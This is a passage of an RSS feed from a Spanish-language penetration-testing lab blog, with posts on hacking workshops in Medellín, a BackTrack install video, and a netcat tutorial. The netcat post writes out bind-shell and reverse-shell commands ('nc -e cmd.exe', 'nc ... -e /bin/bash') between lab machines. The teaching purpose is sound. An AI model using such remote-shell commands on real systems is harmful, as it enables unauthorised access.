<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo/feed</wfw:commentRss>
		<slash:comments>28</slash:comments>
		</item>
		<item>
		<title>Desarrollo del HackTaller 06 en Medellín &#8211; Fotografías y Escenario propuesto</title>
		<link>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto#comments</comments>
		<pubDate>Sun, 30 Nov 2008 04:03:24 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Laboratorio de seguridad informática]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=409</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Muchas gracias nuevamente a todas las personas que asistieron a este Hack Taller 06 en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hack Taller 06" src="http://img78.imageshack.us/img78/8270/hacktaller06xb2.jpg" alt="" width="450" height="296" /></p>
<p style="text-align: center;">
<p style="text-align: justify;">Creo que se ha cumplido este primer objetivo de comenzar a crear los grupos de estudio para estos laboratarios, se han nivelado conceptos relacionados con la <a href="http://es.wikipedia.org/wiki/Seguridad_de_la_informaci%C3%B3n" target="_blank"><strong>seguridad de la información</strong></a>, y se ha hecho un primer contacto a las personas con un <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank"><strong>Test de Penetración</strong></a>.</p>
<p style="text-align: justify;">Este Hack Taller 06 fué una repetición del anterior, pues como mencioné, todas las personas que estaban interesadas en asistir no pudieron hacerlo por falta de cupos, el objetivo entonces de esta repetición era ofrecer una &#8220;oportunidad&#8221; de poder estar allí, para compartir y recibir conocimientos <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> .</p>
<p style="text-align: justify;"><span id="more-409"></span>Muchas gracias a todos y cada uno de los asistentes, como siempre especialmente a Sebas, Jhony y Jhonatan, que siempre están pendientes de los espacios.</p>
<p style="text-align: justify;">Para este Hack Taller he propuesto una metodología que consiste en una primera sección donde hago una exposición de <a href="http://labs.dragonjar.org/category/hacking" target="_blank"><strong>conceptos, técnicas y tácticas</strong></a> sobre seguridad informática y <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> que serán últiles y de interés para la segunda parte donde se lleva a cabo un <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> a un ambiente virtualizado de intrusión.</p>
<p style="text-align: justify;">Dejo entonces el registro fotográfico y el escenario propuesto como primera entrega sobre el desarrollo del Hack Taller.</p>
<p style="text-align: justify;"><strong>Escenario Propuesto</strong></p>
<p style="text-align: justify;">El escenario para este Laboratorio es el de un <a href="http://es.wikipedia.org/wiki/Director_ejecutivo" target="_blank"><strong>CEO</strong></a> de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (<a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iii" target="_blank"><strong>Nessus</strong></a>). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le da un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.<br />
<strong>Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.</strong></p>
<p style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/3069999198/in/set-72157610456974372/" target="_blank"><strong>Galería Fotográfica del 6° HackTaller realizado en Medellín</strong></a><br />
<a href="http://www.flickr.com/photos/31597104@N06/sets/72157610456974372/show/with/3069999198/" target="_blank"><strong>Galería en modo presentación</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Video tutorial de instalación de BackTrack 3</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3#comments</comments>
		<pubDate>Thu, 27 Nov 2008 19:20:10 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Backtrack 3]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=407</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">BackTrack es la herramienta indispensable para casi la totalidad de nuestros laboratorios, y los motivos ya han sido expuestos en muchas oportunidades.</p>
<p style="text-align: center;"><img class="aligncenter" title="backtrack 3" src="http://img232.imageshack.us/img232/8159/bt3qk2.jpg" alt="" width="450" height="355" /></p>
<p style="text-align: justify;">Dejo a continuación una corta definición y el enlace para más información en esta misma página de laboratorios sobre BackTrack.</p>
<p style="text-align: justify;">BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.</p>
<p style="text-align: justify;"><span id="more-407"></span>Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.</p>
<p>Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org</p>
<p style="text-align: justify;">(<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Más información sobre BackTrack</strong></a>)</p>
<p style="text-align: justify;">Ahora publico un video tutorial que he realizado sobre la instalación de BackTrack 3 como sistema base de nuestra máquina.</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/73408823/91de9988/inst_backtrack3_LabsDragonJARorg.html " target="_blank"><strong>Descargar video tutorial de instalación de BackTrack 3 en disco duro</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</title>
		<link>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias#comments</comments>
		<pubDate>Sun, 16 Nov 2008 14:52:01 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=335</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nuevamente muchas gracias a todos y todas las asistentes a este 5° HackTaller realizado en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="all" src="http://img356.imageshack.us/img356/6280/allar9.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;">En el transcurso de la semana iré publicando el ambiente virtualizado de intrusión que utilicé para esta sesión, así mismo publicaré los videos de como realizarlo (solo uno de los métodos para realizarlo, pues existen algunos más).</p>
<p style="text-align: justify;">La asistencia fue masiva, pues al completarse el registro para una persona por computador, muchos atendieron a la opción que dí, la cual consistía en que llevaran sus equipos portátiles personales.</p>
<p style="text-align: justify;"><span id="more-335"></span>Este HackTaller sirvió para entrar en contacto de una manera más práctica con la temática de la seguridad informática, más especificamente con los Test de Intrusión, concientizó a todos los asistentes sobre lo mucho que aún nos falta por aprender y que este espacio y este tipo de eventos nos permitirán mejorar , investigar y desarrollar capacidades cognoscitivas.</p>
<p style="text-align: justify;">El próximo sabado repetiré este mismo HackTaller con las personas que esten interesadas en asistir y que no alcanzaron cupo. El martes confirmo la realización del mismo.</p>
<p style="text-align: justify;">No queda nada más que agradecer a todos los asitentes, como siempre a Jhony y Sebas quienes siempre están pendientes y dispuestos a facilitarme el espacio, a los nuevos amigos del Sena, quienes se hicieron presentes y compartieron de este HackTaller (y que le dirán a fernando que les enseñe todo lo que el sabe), a los compañeros de SoftNet (quienes por amor al arte les toco sentados en el piso con sus laptops) que amablemente ofrecieron algunos dispositivos que poseen en sus trabajos.</p>
<p style="text-align: justify;">A todos los que no pudieron asistir se les extrañó, y espero que puedan hacerlo para el próximo HackTaller <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Dejo a continuación el enlace de acceso al registro fotográfico del HackTaller, (<span style="text-decoration: line-through;">no quedé en ninguna foto&#8230; ando de fotografo últimamente XD creo que moriré de hambre&#8230;</span>)</p>
<h2 style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/sets/72157609204085715/" target="_blank"><strong>Galería Fotográfica del 5° HackTaller realizado en Medellín</strong></a></h2>
<h2 style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/sets/72157609204085715/show/" target="_blank">Galería en modo presentación</a></h2>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Netcat</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat#comments</comments>
		<pubDate>Thu, 06 Nov 2008 21:55:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=312</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).</p>
<p style="text-align: justify;"><span id="more-312"></span>Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.</p>
<p style="text-align: justify;">Ya en desuso, originariamente se trataba de una potentísima herramienta de red para administradores no habiéndose descubierto hasta la fecha el total de los comandos que se utilizaban, los cuales permanecen secretos por las particularidades de esta herramienta. (<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Más información &#8211; Web Oficial</strong></a>)</p>
<p style="text-align: justify;">En muchas ocasiones y por diferentes razones se hace necesario realizar conexiones a puertos TCP y UDP.</p>
<p style="text-align: justify;">Algunas de estas razones pueden ser:</p>
<ul style="text-align: justify;">
<li>Cuando necesitamos comprobar la disponibilidad de un puerto (si este se encuentra abierto o cerrado).</li>
<li>Cuando queremos leer el banner de dicho puerto (servicio gestionado por el mismo).</li>
<li>Cuando necesitamos conectarnos a un servicio de red de manera manual.</li>
</ul>
<p style="text-align: justify;">El modo de uso de netcat ya ha sido tratado de manera superficial en algunos laboratorios. Trataremos entonces de profundizar un poco más en este laboratorio sobre las posibilidades de la herramienta, aunque tampoco será la &#8220;Guía definitiva de Netcat&#8221;, si nos acercará un poco más a la misma.</p>
<p style="text-align: justify;">Algunas de las publicaciones donde he hecho referencia sobre netcat son las siguientes:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Identificación de Banner’s (Banderas) I</strong></a><br />
<a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Scanning II</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (II de VIII)</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (III de VIII)</strong></a></p>
<p style="text-align: justify;"><strong>Ayudas y Opciones de Comandos</strong></p>
<p style="text-align: justify;"><strong>Nota:</strong> Netcat es una herramienta que viene incluída y lista para ser usada desde la distribución Linux BackTrack, la cual es el objeto de estudio de esta serie de prácticas.</p>
<p style="text-align: justify;">Uno de los primero acercamientos a netcat que debe realizar cada investigador es la exploración del propio sistema de ayudas y opciones de comandos que incluye la herramienta. Para ello bastará con ejecutar la siguiente sintaxis desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>nc -h</strong></p>
<p style="text-align: justify;">Para lo cual obtendremos el siguiente resultado:</p>
<p style="text-align: justify;"><strong>nc -h<br />
[v1.10]<br />
connect to somewhere: nc [-options] hostname port[s] [ports] &#8230;<br />
listen for inbound: nc -l -p port [-options] [hostname] [port]<br />
options:<br />
-e prog program to exec after connect [dangerous!!]<br />
-g gateway source-routing hop point[s], up to 8<br />
-G num source-routing pointer: 4, 8, 12, &#8230;<br />
-h this cruft<br />
-i secs delay interval for lines sent, ports scanned<br />
-l listen mode, for inbound connects<br />
-n numeric-only IP addresses, no DNS<br />
-o file hex dump of traffic<br />
-p port local port number<br />
-r randomize local and remote ports<br />
-s addr local source address<br />
-t answer TELNET negotiation<br />
-u UDP mode<br />
-v verbose [use twice to be more verbose]<br />
-w secs timeout for connects and final net reads<br />
-z zero-I/O mode [used for scanning]<br />
port numbers can be individual or ranges: lo-hi [inclusive]</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img511.imageshack.us/img511/996/netcat1px6.jpg" alt="" width="450" height="540" /></p>
<p style="text-align: justify;"><strong>Identificación de Banners e información</strong></p>
<p style="text-align: justify;">Para intentar una conexión y obtener información de un sistema y puerto específico la sintaxis es la siguiente:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/6339/netcat2by4.jpg" alt="" width="450" height="346" /></p>
<p style="text-align: justify;">Una vez visualizada la información requerida procedemos a detener la ejecución con la combinación de teclas Ctrl + C.</p>
<p style="text-align: justify;"><strong>Consultando el Servidor Web que gestiona un sistema Objetivo</strong></p>
<p style="text-align: justify;">Se trata de realizar una conexión al puerto comunmente utilizado para servir páginas Web (80), luego se envía una petición HTTP / HEAD para obtener y leer el banner del servidor HTTP. Para ello ejecutaremos la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9316/netcat3bm2.jpg" alt="" width="450" height="366" /></p>
<p style="text-align: justify;"><strong>Netcat a la escucha sobre puertos TCP/UDP y Chat<br />
</strong></p>
<p style="text-align: justify;">Establecer a Netcat en modo &#8220;listen&#8221; (escucha) en un puerto TCP / UDP es una de las tareas más implementadas con la herramienta, pues permite depurar clientes y/o aplicaciones de red, envío/recepción de datos, ejecución de terminales, etc.</p>
<p style="text-align: justify;">Vamos como establecer a Netcat en modo &#8220;listen&#8221; (escucha) y como podemos implementar sobre el mismo un pequeño pero útil sistema de Chat entre dos equipos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9841/netcat4dt9.jpg" alt="" width="450" height="447" /></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img509.imageshack.us/img509/3803/netcat5vm4.jpg" alt="" width="450" height="414" /></p>
<p style="text-align: justify;">La máquina con Linux BackTrack será el sistema donde se establezca Netcat en modo &#8220;listen&#8221;, veamos:</p>
<p style="text-align: justify;"><strong>nc -lvv 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img354.imageshack.us/img354/7607/netcat6kb3.jpg" alt="" width="356" height="318" /></p>
<p style="text-align: justify;">El cliente será el sistema Windows</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img361.imageshack.us/img361/9703/netcat7tx4.jpg" alt="" width="450" height="409" /></p>
<p style="text-align: justify;"><strong>Transferencia de Archivos con Netcat</strong></p>
<p style="text-align: justify;">Otra de las bondades que permite realizar Netcat es la posibilidad de habilitar una conexión para transferir archivos entre dos equipos. Esto permitirá entonces enviar/recibir archivos de texto y/o binarios entre ellos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Debemos ejecutar la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 &gt; salida.txt</strong></p>
<p style="text-align: justify;">El equipo server (Linux BackTrack) estará habilitado en modo listen (escucha) y redireccionando los datos recibidos a un archivo de salida, veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/6551/netcat8ob1.jpg" alt="" width="395" height="321" /></p>
<p style="text-align: justify;">El equipo cliente (Windows) establecerá la conexión con BackTrack (al puerto 12345) y enviará el archivo.<br />
para ello primero crearemos el archivo de texto a enviar. Veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/8930/netcat9do1.jpg" alt="" width="463" height="239" /></p>
<p style="text-align: justify;">Así se vería desde el servidor BackTrack cuando recibe los datos</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img378.imageshack.us/img378/5779/netcat10os7.jpg" alt="" width="408" height="269" /></p>
<p style="text-align: justify;">Luego procedemos a comprobar la información contenida en el envío</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img136.imageshack.us/img136/9493/netcat11np8.jpg" alt="" width="415" height="292" /></p>
<p style="text-align: justify;"><strong>Administración Remota con Netcat (Shell)<br />
</strong></p>
<p style="text-align: justify;">Sin lugar a dudas esta es una de las mejores utilidades que se le pueda dar a Netcat, pues como hemos visto esta grandiosa herramienta permite redireccionar instrucciones y comandos. Esto significa que podemos tomar por ejemplo un archivo .exe y redirigir la entrada/salida y mensajes de error a los puertos TCP/UDP que establezcamos.</p>
<p style="text-align: justify;">Veamos en la práctica como podemos redirigir el ejecutable CMD.EXE a un cliente de red en un puerto local. De esta manera ofreceremos una línea de comandos a cualquier usuario que establezca una conexión a nuestro equipo y puerto establecido.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Windows hará el papel de servidor, quién ofrecerá una línea de comandos a los clientes que establezcan una conexión con él.</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 -e cmd.exe</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img243.imageshack.us/img243/2668/netcat12iu5.jpg" alt="" width="405" height="257" /></p>
<p style="text-align: justify;">Ahora desde BackTrack, quién actua como cliente, establecerá una conexión con Windows. Veamos:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img151.imageshack.us/img151/7813/netcat13my1.jpg" alt="" width="413" height="373" /></p>
<p style="text-align: justify;"><strong>Shell Inversa con Netcat</strong></p>
<p style="text-align: justify;">A diferencia del escenario anterior y como en muchas ocasiones sucede, no se puede controlar y administrar las salidas/entradas o disposición de puertos. Para ello Netcat nos ofrece otra solución más en su repertorio. Se trata entonces de establacer a Netcat en modo &#8220;listen&#8221; y el posterior envío/recepción de comandos, entre ellos la ejecución de una terminal. Veamos:</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">En este caso el sistema Windows pretende obtener una shell del sistema Linux BackTrack, con la limitante de que BackTrack no puede en ese momento servir una shell en modo &#8220;Listen&#8221;.</p>
<p style="text-align: justify;">Desde Windows se establece el modo Listen:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img262.imageshack.us/img262/6366/netcat14wp3.jpg" alt="" width="343" height="255" /></p>
<p style="text-align: justify;">Ahora desde Backtrack se establece la conexión hacia Windows y la instrucción que este deberá servir al mismo:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345 -e /bin/bash</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/3433/netcat15fu3.jpg" alt="" width="411" height="367" /></p>
<p style="text-align: justify;">Enviemos una instrucción (comando) desde Windows para que el resultado pueda ser visualizado desde el mismo.</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/1160/netcat17ja3.jpg" alt="" width="450" height="321" /></p>
<p style="text-align: justify;">Estos son solo algunos de los muchos usos que se le pueden dar a Netcat, por ello es que se le conoce como la navaja suiza de las redes <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> .</p>
<p style="text-align: justify;">A partir de este momento queda abierto el espacio para que los interesados profundicen en el uso de la herramienta.</p>
<p style="text-align: justify;">Recomiento la lectura de estas páginas web, donde se detallan algunos usos e información de la herramienta:</p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"><strong>Crysol<br />
Netcat en la Wikipedia</strong></a><br />
<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Web Oficial de Netcat</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>HackTaller 02 en Medellín</title>
		<link>http://labs.dragonjar.org/hacktaller-02-en-medellin</link>
		<comments>http://labs.dragonjar.org/hacktaller-02-en-medellin#comments</comments>
		<pubDate>Fri, 29 Aug 2008 19:48:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=240</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El próximo sabado 30 de Agosto se llevará a cabo, el segundo HackTaller en la ciudad de Medellín con los miembros de la <a href="http://foro.dragonjar.us/" target="_blank">Comunidad DragonJAR</a> de esta ciudad.</p>
<p style="text-align: justify;">Para este HackTaller se realizará un Test de Intrusión de un Aplicativo Web. No se requiere un nivel de conocimientos avanzados en temas de seguridad, más si en informática en general, nociones básicas de seguridad, programación, linux y principalmente muchos deseos de aprender y compartir conocimiento.</p>
<p style="text-align: justify;">
<ul style="text-align: justify;">
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-part-i" target="_blank">Identificación de banners</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-i" target="_blank">Enumeración del objetivo</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">Escaneo</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">Ataques de fuerza bruta</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Escaneo de vulnerabilidades</a></li>
<li><a href="http://www.dragonjar.org/programacion-segura" target="_blank">Análisis de código fuente</a></li>
<li>Injecciones de código y archivos</li>
<li>Explotación de vulnerabilidades</li>
<li>etc</li>
</ul>
<p style="text-align: justify;">Se recomienda además leer los laboratorios que se han publicado en la página, donde se dan algunas definiciones importantes y necesarias para el HackTaller, y donde se hace uso de algunas herramientas imprescindibles para este tipo de prácticas.</p>
<p style="text-align: justify;"><span id="more-240"></span></p>
<ul style="text-align: justify;">
<li>BackTrack</li>
<li>NetCat</li>
<li>Nmap &#8211; Nmapfe</li>
<li>Hydra</li>
<li>etc</li>
</ul>
<p style="text-align: justify;">El lugar donde se realizará el HackTaller será en la sede oficial de los Laboratorios de la Comunidad DragonJAR, <a href="http://www.netmaniavirtual.com/" target="_blank">Netmania Media Group</a>.</p>
<p style="text-align: justify;"><strong>Hora:</strong> 2 pm<br />
<strong>Valor:</strong> 1.000 pesos la hora por el servicio de computadores disponibles (este precio es el acordado por el administrador del local comercial), el HackTaller se llevará en un mínimo de 5 horas.<br />
<strong>Materiales:</strong> Deseos de aprender y compartir</p>
<p style="text-align: justify;"><strong>Notas aclaratorias: </strong>El local comercial ofrece servicios de internet a usuarios regulares, por ello se estableció cobrar las horas en que haremos uso de las máquinas. En ningún momento, yo (<a href="http://foro.dragonjar.us/profiles/4v4t4r-u90.html" target="_blank">4v4t4r</a>), o la Comunidad DragonJAR busca algún tipo de lucro económico con este HackTaller.</p>
<p style="text-align: justify;">Las máquinas, con los sistemas virtualizados, la documentación y las memorias del HackTaller, quedan abiertas y disponibles al público en general para que realicen el laboratorio en los horarios de servicio del local comercial (Lunes a Sabado de 9 am a 10 pm).</p>
<p style="text-align: justify;"><strong>IMPORTANTE:</strong><br />
Es necesario realizar previa inscripción al HackTaller enviando un correo electrónico a 4v4t4r@gmail.com (nombre o nick, e-mail de contacto)</p>
<p style="text-align: justify;">Los cupos son bastante limitados así que para este primer HackTaller se tendrá preferencia para usuarios activos de la Comunidad. Además dependiendo de la cantidad de pre-inscritos se considerará hacer dos sesiones, una por la mañana con un grupo de usuarios y una por la tarde con otro grupo.</p>
<p style="text-align: justify;"><strong>Ubicación:</strong></p>
<p style="text-align: justify;">
<p style="text-align: center;"><a href="http://img528.imageshack.us/img528/6034/netmania2px8.jpg"><img class="aligncenter" src="http://img528.imageshack.us/img528/6034/netmania2px8.th.jpg" alt="" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-02-en-medellin/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, servicios básicos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</link>
